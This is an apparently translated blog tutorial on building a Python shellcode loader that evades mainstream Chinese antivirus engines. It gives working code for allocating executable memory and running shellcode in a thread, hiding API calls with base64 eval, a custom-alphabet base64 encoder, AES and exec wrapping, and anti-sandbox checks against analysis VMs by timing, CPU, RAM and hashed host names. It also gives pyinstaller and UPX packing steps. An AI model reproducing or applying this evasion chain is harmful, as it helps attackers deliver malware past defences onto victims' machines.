
Python AV evasion with a modified encoder


Preface

I looked at a few Python AV-evasion projects and threw together one of my own, aimed at bypassing the mainstream domestic (Chinese) AV engines.

Final evasion result

[result screenshots omitted]

Building the evader

The first step is picking a shellcode loader; usually you just find an AV-evasion writeup online and reuse the loader it shows. The one below assumes a 64-bit Python interpreter with matching 64-bit shellcode: declaring VirtualAlloc's return type as c_uint64 is what keeps the returned pointer from being truncated to 32 bits.

import ctypes

# Shellcode loader: allocate RWX memory, copy the shellcode in, run it on a new thread
def shellCodeLoad(shellcode):
    # 64-bit return type so the pointer is not truncated on x64
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
    # from_buffer needs a writable buffer, which is why the caller passes a bytearray
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))
    # Start a thread at the buffer and block on it; -1 is INFINITE
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

if __name__ == "__main__":
    # b'shellcode' stands in for the real payload bytes
    shellCodeLoad(bytearray(b'shellcode'))

Testing

Unfortunately it was killed before it even landed on disk.

Trying an extra layer of Base64 encoding

import ctypes
import base64

def shellCodeLoad(shellcode):
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    #ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))
    # Same RtlMoveMemory call as the commented line above, stored as base64-encoded source text and evaluated at run time
    eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

if __name__ == "__main__":
    # b'shellcode' stands in for the real payload bytes
    shellCodeLoad(bytearray(b'shellcode'))

Still didn't land; it seems this guy's method no longer works. A sad day of failed freeloading.

Modify the Base64 symbol table: write your own base64 module that uses a custom character set, shuffle the order of the encoding table, and implement base64 encode/decode yourself instead of importing the Python module.


Once the Base64 alphabet has been customized, off-the-shelf base64 decoders can no longer decode the output.
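The custom-alphabet Base64 described above, as an added example; this is not the author's module (the post shows that only in screenshots). The seed-based make_alphabet helper, the function names, and the choice of "=" as the pad symbol are assumptions of this example. Encoding with a reordered table yields text that a standard decoder turns into garbage rather than the original bytes, which is the effect the post relies on.

```python
import random
import string

# Standard RFC 4648 table; a custom table is any permutation of these 64 symbols.
STD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
PAD = "="  # assumption: keep the usual pad symbol, which must not appear in the table


def make_alphabet(seed: int) -> str:
    """Derive a shuffled 64-symbol table from a seed (the seed is an assumption
    of this example; the post does not say how the author built his table)."""
    chars = list(STD_ALPHABET)
    random.Random(seed).shuffle(chars)
    return "".join(chars)


def b64_encode_custom(data: bytes, alphabet: str = STD_ALPHABET) -> str:
    """Base64-encode data using alphabet as the 6-bit symbol table."""
    if len(alphabet) != 64 or len(set(alphabet)) != 64 or PAD in alphabet:
        raise ValueError("alphabet must be 64 distinct symbols and must not contain the pad")
    out = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        # Pack up to 3 bytes into a 24-bit integer, zero-padded on the right.
        bits = int.from_bytes(chunk.ljust(3, b"\0"), "big")
        sextets = [(bits >> 18) & 63, (bits >> 12) & 63, (bits >> 6) & 63, bits & 63]
        keep = len(chunk) + 1  # 3 bytes -> 4 symbols, 2 -> 3, 1 -> 2
        out.append("".join(alphabet[s] for s in sextets[:keep]))
        out.append(PAD * (4 - keep))
    return "".join(out)


def b64_decode_custom(text: str, alphabet: str = STD_ALPHABET) -> bytes:
    """Inverse of b64_encode_custom; raises KeyError on a symbol outside alphabet."""
    rev = {c: i for i, c in enumerate(alphabet)}
    text = text.rstrip(PAD)
    out = bytearray()
    for i in range(0, len(text), 4):
        group = text[i:i + 4]
        if len(group) == 1:
            raise ValueError("truncated input: a group of one symbol carries no whole byte")
        bits = 0
        for c in group:
            bits = (bits << 6) | rev[c]
        bits <<= 6 * (4 - len(group))  # left-align to 24 bits
        out += bits.to_bytes(3, "big")[:len(group) - 1]  # 4 symbols -> 3 bytes, 3 -> 2, 2 -> 1
    return bytes(out)
```

With the default table the functions reproduce the standard encoding (b"hello" becomes "aGVsbG8="); with the table reversed the same input becomes "l5qTk5D=", which a standard decoder accepts but decodes to unrelated bytes. Note that this is obfuscation, not encryption: the table is a constant inside the binary, so anyone who extracts the script can decode the payload in seconds.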


Pull a few algorithm problems from LeetCode and use their solutions as junk code padding, adapted from the reference solutions.


Wrap the loader source in exec, AES-encrypt it, and run the shellcode through the modified Base64 twice for obfuscation. Because the loader has to decrypt itself at run time, the AES key and the custom alphabet both ship inside the executable; these layers defeat static string matching, not analysis of the unpacked script.


Add anti-sandbox logic (the rules can be lifted straight from open-source evasion projects on GitHub; copy and paste is enough) so the sample refuses to run inside virtual analysis environments.


import sys
import time
from getpass import getuser
from hashlib import sha256
from os import cpu_count
from socket import gethostname

import psutil  # third-party: pip install psutil

# Salted SHA-256 hashes (see hash_name) of user and host names known from sandboxes.
# The original defines the same list twice, once per function; it is kept once here.
_SANDBOX_NAME_HASHES = [
    "3e93bb7b2887e4881fa7da105c8d95b1893a8373e2e24bee8460dcb69bd3cf04", "2cd7b171d2155f0878a5b89ac6fea662241d05e7ef1555452a92006d2a7021f9", "7707505e68f824301174b8824a9b9df32605193986fbcb61d0a18d0d28cf9e56",
    "414efb531d1cb23f5778650492d0c7cae356a9633479ef59b1e2169ff9823265", "8af67b85a6d66d4c84eb00dc9b4a662a88be1f6339c343f0f27403745ca5fec5", "97c27f98cb4a1af26817b4137ef1baab09d6407e423cf1b99997289cc9786c38",
    "14a3ca62b588cf9aa4e9164a4882d66fff67d0a09ba29aeca41b780583901370", "cd5f0ac52ead5ad93bb7f732aabf554bf61f8a3070f50b02a91a7b3db99c3205", "880473c8b0932cd60b918c0476ad84430739d77f4a01898bb214c842b7d25bd2",
    "01568c005922d1a75fc61738c75c4546870ecc5a5571c83934ccab5ab4156ea8", "d06b048d8ab08ee0778dd18bea5fe42b78dcb3bec7b6c57a3f029168e10edcd3", "6cf318048779a91ef96bd2cd1ead164c12d1c57e0b2ffc27f4fa184242a960dd",
    "b6ca2c4d97e775b984312c0c383097dd9b8beadbbb5d1f516441a0372b443d38", "7f4d76ebe8a027c4d0f198f14971bf09400c9452efca9d458fef22be1b73118d", "dcac8e623396c5f9459460209c55435ef52bb16424edf6da136ba84cd2b35982",
    "e831df0ae56afd1a0a086d723e7876a7096428284c2efd40a611c4dece5d226c", "9c4c99c53a93995dc9630b1c0b384955a71904c360e8596cef5811a9e45f2b8b", "67f6331ef1bd6d094ce49dfdf2e9cd86e636c8aa88a6c9b86c86e9beb4d7f7b9",
    "709175a4a328264d72a2e92e16ffa4a6e6eadf72da354e3673f5e27cac92bf63", "a0a3531a232f67d10627647ad48d0eb032d4b5dde05bf229cdbd5be6798747b5", "6d376cff5c619aa02f76b8742c4b4eedd54ffa2582afedee465d150ba2b0b438",
    "34ac133f0eac7f69b29f86eff4954c739203eaf4855b6c82a201f039268c937e", "d3d3e02d666cabb5e26b33de344b5bb08095a1bd73be8201800b56f26ee29d38", "1f3dfcc66198c87416e8004e33c932b94cfecac38732dd895e4324add7ab4c91",
    "8a08da7c7ac2a709e019a97699d1a3f920680ad712207d23134426a53f0c95e4", "3be0c9573bc4b1e81c26bbb77e00c4d585868fe44dcfce48c5924dea9f2b49ca", "5a6e0bd92925b9f91ffec26805eb653f8d5117e8b4813248a87b55765729c0a2",
    "f0b35713f16c4d9cfdbe4dc9b7cc7c8f24676e81cffe1150c8529205a4426d71", "19203833e3dc9e0871ee98daa166f8817c2deedc44fd8371a55dc0119003ba5c", "71bc0e605d52850557bf58f35f60f4deee63ceb2b2613d36e1a87f1a63483c3e",
    "2da5c4ea837e60abf644c217ed0f360a1221d033b3ef7486ab267dc5ffa31841", "dfca1dca8404208458945cc023a905306dc15e4680c0803055210bc71858ecdd", "a6687db04a62d5b549b1fb9dbc42af981949aa2349a47ac3cc1128d2839ffe2e",
]

def get_sanbox_users():
    return _SANDBOX_NAME_HASHES

def get_sanbox_computers():
    return _SANDBOX_NAME_HASHES

def hash_name(i_str: str):
    # Names are stored as salted hashes so the blocklist itself is not readable in the binary
    i_str += "CanUGuessMe?"
    return sha256(i_str.encode()).hexdigest()

def check_vm():
    """
    Anti-sandbox logic: exit quietly when the host looks like an analysis VM
    """
    total = round(psutil.virtual_memory().total / (1024.0 * 1024.0 * 1024.0), 2)  # RAM in GiB
    pre = int(time.time())
    user = getuser()
    compuer = gethostname()
    time.sleep(2)
    now = int(time.time())
    if now-pre < 2:      # sleep was skipped or accelerated, typical of sandboxes
        sys.exit(1)
    if cpu_count() < 3:  # fewer than 3 logical CPUs
        sys.exit(0)
    if total < 2:        # less than 2 GiB of RAM
        sys.exit(0)
    print(hash_name(user),get_sanbox_users())  # debug output left in by the author
    if hash_name(user) in get_sanbox_users():
        sys.exit(0)
    if hash_name(compuer) in get_sanbox_computers():
        sys.exit(0)

When building the exe with pyinstaller, UPX compression brought the size down to 6.68 MB; executables built from Python are comparatively large. The --upx-dir option takes the directory that contains the upx binary (the path is left blank in the original command). UPX packing is itself a well-known heuristic signal for some engines, so it is worth testing the build both with and without it.

pyinstaller -i teaa.ico -F tesioa.py --noconsole --upx-dir=


Test results

[result screenshots omitted]

Original article by moonsec; if you repost it, please credit the source: https://www.moonsec.com/8141.html
